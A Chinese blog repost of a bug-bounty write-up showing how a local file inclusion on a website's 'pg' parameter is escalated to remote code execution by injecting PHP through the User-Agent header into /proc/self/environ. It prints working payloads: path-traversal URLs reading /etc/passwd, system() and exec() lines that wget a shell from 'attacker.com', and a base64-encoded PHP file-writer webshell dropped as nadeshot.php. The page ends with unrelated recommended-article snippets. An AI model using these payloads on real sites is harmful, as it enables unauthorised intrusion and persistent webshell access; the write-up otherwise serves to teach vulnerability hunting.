tc写入txt成功却没有内容_挖洞经验 | 构造UserAgent请求头内容实现LFI到RCE提权

最新推荐文章于 2024-05-22 14:30:39 发布
最新推荐文章于 2024-05-22 14:30:39 发布
阅读量279 收藏
点赞数
文章标签: tc写入txt成功却没有内容
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39915605/article/details/111362777
版权

fd3e4008fc2b7608c3432980639ac36f.png本文分享的Writeup是作者近期针对某20000+用户网站,通过对请求User-Agent内容构造,成功实现从本地文件包含漏洞(LFI)到远程代码执行漏洞(RCE)的提权。

发现LFI漏洞

以下为目标网站的Contact Us链接路径:

https://www.website.com/index.php?pg=contact.php

2110274bb1d46fff36aa485e19402f7a.png

经过对pg参数的fuzz,我发现其中存在LFI漏洞,可以用../../../../etc/passwd直接读出系统密码信息:

https://www.website.com/index.php?pg=../../../../etc/passwd

a37649c10d4b1a802ee49e6290a58d49.png

从LFI到RCE

要想把LFI提权到RCE, 我又发现另一个可读路径/proc/self/environ,于是我有了以下构造:

https://www.website.com/index.php?pg=../../../../proc/self/environ

76420dafef720ed720a68f08d1c203ff.png
很好,从其输出中可以看到,其中包含了如HTTP_USER_AGENT等一些环境变量参数:

9dfa0da59876563fa86a6f07f5458ee1.png不错,开启BurpSuite,用system()方法更改请求中的User-Agent值:

User-Agent: <?system (‘wget http://attacker.com/shell.txt -O shell.php’);?>

不行,无效。再试试exec()方法:

User-Agent: <?exec (‘wget http://attacker.com/shell.txt -O shell.php’);?>

也是不行,无效。那用phpinit()试试:

User-Agent: <?php phpinfo(); ?>

折腾了一阵后,我差点忘了我是可以向目标网站服务器写东西的啊,于是我就又在User-Agent头中构造了以下Payload:

User-Agent: <?php  $a = base64_decode('PD9waHAgCiAgJGEgPSAkX1BPU1RbJ2NvZGUnXTsKICAkZmlsZSA9IEBmb3BlbigkX1BPU1RbJ2ZpbGUnXSwndycpOwogIEBmd3JpdGUoJGZpbGUsJGEpOwogIEBmY2xvc2UoJGZpbGUpOwo/Pgo8Y2VudGVyPgogIDxmb3JtIG1ldGhvZD0icG9zdCIgaWQ9ImZvcm0iPgogICAgPGgyPkZpbGUgV3JpdGVyPC9oMj4KICAgIEZpbGUgTmFtZTxicj48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZSIgcGxhY2Vob2xkZXI9InNoZWxsLnBocCI+PGJyPgogICAgU2hlbGwgQ29kZTxicj48dGV4dGFyZWEgbmFtZT0iY29kZSIgZm 9ybT0iZm 9ybSIgcGxhY2Vob2xkZXI9IlBhc3RlIHlvdXIgc2hlbGwgaGVyZSI+PC90ZXh0YXJlYT48YnI+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iV3JpdGUiPgogIDwvZm 9ybT4KPC9jZW50ZXI+Cg=='); $file = fopen('nadeshot.php','w'); echo fwrite($file,$a); fclose($file); ?>

解释上述构造的Payload

上述构造使用的最终Payload是一个base64编码的webshell,原代码文件存在于Github库中-https://github.com/alita-ido/PHP-File-Writer/blob/master/lfi-writer.php,其大概造型为:

$a = base64_decode(‘webshell_base64_encoded_code_here’);

然后我们向服务器中写入了一个名为nadeshot.php的文件:

$file = fopen(‘nadeshot.php’,’w’);

然后服务器会把base64编码的上述文件写入nadeshot.php文件:

echo fwrite($file,$a);

再保存文件:

fclose($file);

上述请求Payload执行后的BurpSuite动作如下:acc5960dd05b3782e0c2bbd702a0ded5.png

响应成功。希望我们的Webshell可以成功,访问https://website.com/nadeshot.php试试看:

2c2773ddcb2e84d4401bdebe2d96eb57.pngWebshell写入成功,保存为了nadeshot.php,太好了,我们再接着往里写入nadeshot.txt文件试试:

250feed43cc65b5828ed47d5cda60076.png

然后访问https://website.com/nadeshot.txt,一样有效:

6ec9303fd32bbb7613927bdc1d3474bc.png就这样,成功实现了从LFI到RCE的提权。

weixin_39915605
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php中修改浏览器的User-Agent来伪装你的浏览器和操作系统
12-18
得到HTTP_USER_AGENT 的方法很简单,比如php代码: 复制代码 代码如下: <?php print_r($_SERVER); ?> 复制代码 代码如下: <?php print_r($_SERVER[‘HTTP_USER_AGENT’]); ?> 这两种都可以得到User-Agents和IP等信息,最好配合正则表达式,对信息进行筛选剔除。 ————– User-Agents列表————- Internet Explorer 6 Internet Explorer 7 Internet Explorer 8 Firefox Chrome Safari Netscape Oper
php 设置 useragent,PHP如何设置User Agent
weixin_29679557的博客
03-11 1786
最近有在用PhpQuery,发现抓取一些网页的内容是空内容,询问了解到是设置了判断User Agent这个属性。于是一直在找PhpQuery怎么设置UserAgent,无奈PhpQuery文档太少,暂时没有找到,便去寻找PHP原生设置UserAgent的方法,找到了两种。无User Agent代码:include 'phpQuery.php';phpQuery::newDocumentFile('...
使用 PHP 解析 User agent 信息
z9web的博客
02-23 1万+
在使用浏览器发起的 HTTP 请求中,通常会包含一个识别标识。它名为 User Agent,简称 UA。它是一串包含了客户端基础信息的字符串。通过它可以方便的获取客户端的操作系统,语言,浏览器和版本信息。 在 PHP 中查看客户端 UA 标识的方式是读取系统常量 $_SERVER 中的 HTTP_USER_AGENT 选项: echo $_SERVER['HTTP_USER_AGENT
PHP实现解析 User agent 信息(附完整源码)
最新发布
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-22 113
PHP实现解析 User agent 信息(附完整源码)
实用的php封装函数
洋葱
05-08 4761
PHP判断手机是IOS还是Android实例实例1:主要是要用到HTTP_USER_AGENT,它表示的意思是用来检查浏览页面的访问者在用什么操作系统(包括版本号)浏览器(包括版本号)和用户个人偏好的代码。监测代码如下:function get_device_type(){ //全部变成小字母 $agent = strtolower($_SERVER['HTTP_USER_AGENT']); $...
jQuery简单实现点击文本框复制内容到剪贴板上的方法
10-21
在这个实例中,我们将探讨如何使用jQuery来实现一个功能,即当用户点击文本框时,自动将文本框中的内容复制到剪贴板上。这个功能在很多网站中都有应用,例如复制链接、代码或重要信息。 首先,我们需要了解浏览器对...
json fake_useragent fake_useragent
06-24
fake_useragent json缓存 爬虫 fake 消息头
furuiyang0715#spider_notes#01-伪装请求头-简单实用的fake-useragent库1
07-25
使用说明测试一个生成伪装请求头的模块查看 ua 的属性创建 ie 浏览器的请求头创建 opera 浏览器的请求头创建 firefox 浏览器的请求头创建 saf
fake_useragent_0.1.11.json.zip
09-07
解决fake_useragent提示断网问题
webview添加参数与修改请求头user-agent实例
08-19
WebView 添加参数与修改请求头user-agent 实例 本文主要介绍了 WebView 添加参数与修改请求头user-agent 实例,旨在解决移动端 H5 页面登录问题。下面是对相关知识点的详细说明: 一、 WHY 需要添加参数和...
php服务端 和 python 爬虫 结合 user-agent
睡觉不打呼噜的博客
11-01 465
php 之 python 爬虫 python爬虫 配合 php 做个练习。
php根据user-agent判断客户端是pc还是wap
i_koo的博客
06-27 4582
GitHub 上有类库: https://github.com/serbanghita/Mobile-Detect; 不用看下面的了。。。 最近要做一个api,返回内容要区分pc还是wap,于是想到了用 http 请求头user-agent 来判断。 什么是user-agent 难点在于移动端设备繁多,浏览器几乎一种设备一个版本,要全部兼容判断,有难度。于是,在网上搜罗了很多资料,尽量...
随机User-Agent请求头构造
测试0901-1
04-28 104
pip3 install fake-useragent ua = UserAgent() ua.ie # Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US); ua.msie # Mozilla/5.0 (compat...
PHP获取访问浏览器的唯一标识useragent,判断是不是oppo内置浏览器
美奇软件开发工作室
11-07 4466
最近遇到一个问题,我的网站域名被oppo内置浏览器给拦截了,我提交申请一两个月了,都没有工作人员处理,可见oppo浏览器非常的不称职,建议大家不要用。14、今日头条app内置浏览器的useragent:NewsArticle、TTWebView。18、搜狗手机app内置浏览器 SogouMobileBrowser。17、OPPO手机内置浏览器 HeyTapBrowser。22、手机百度app内置浏览器 baiduboxapp。20、小米手机内置浏览器 MiuiBrowser。1、获取useragent。
php 防止爬虫,服务器反爬虫攻略:Apache/Nginx/PHP禁止某些User Agent抓取网站
yshir
05-05 1076
本文主要向大家介绍了PHP语言学习之php 防止设置,通过具体的内容向大家展示,希望对大家学习php语言有所帮助。php 防止爬虫设置例如:服务被疯狂。
PHP User Agent
weixin_33875839的博客
01-29 167
以下是摘自百度百科关于User Agent的相关描述: User Agent中文名为用户代理,简称UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。 一些网站常常通过判断 UA 来给不同的操作系统、不同的浏览器发送不同的页面,因此可能造成某些页面...
PHP-从LFIRCE(上)
qq_50643984的博客
08-31 1665
利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfirce。...
C++ 简单读文本文件、统计文件的行数、读取文件数据到数组
热门推荐
饮一盏岁月流香
12-15 1万+
C++ 简单读文本文件、统计文件的行数、读取文件数据到数组 原文链接:http://www.cnblogs.com/helinsen/archive/2012/07/26/2609251.html C++ 简单读文本文件、统计文件的行数、读取文件数据到数组 fstream提供了三个类,用来实现c++对文件的操作。(文件的创建、读、)。 ifstream -- 从已有的文件读 ofs
TCPIP网络编程(一)
m0_67391870的博客
03-29 202
这一系列博客将用于记录学习《TCP/IP网络编程》的笔记。 先上代码。下面是服务器端的代码 #include <stdio.h> #include <stdlib.h> #include <string.h> //提供针对系统调用的封装 #include <unistd.h> //提供用于网络字节序转换的函数 #include <arpa/inet.h> #include <sys/socket.h> //错误信息展示 void er
from fake_useragent import UserAgent user_agent=UserAgent() 上述代码中可以有多少个请求头
05-29
这段代码的作用是使用 Python 库 `fake_useragent`,生成一个随机的用户代理(user agent)字符串,用于模拟浏览器发送 HTTP 请求时携带的请求头信息。 这个生成的用户代理字符串中包含了浏览器类型、操作系统、浏览器版本、语言等信息,可以用于反爬虫和隐藏真实身份。 这段代码只生成了一个随机的用户代理字符串,因此只有一个请求头
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值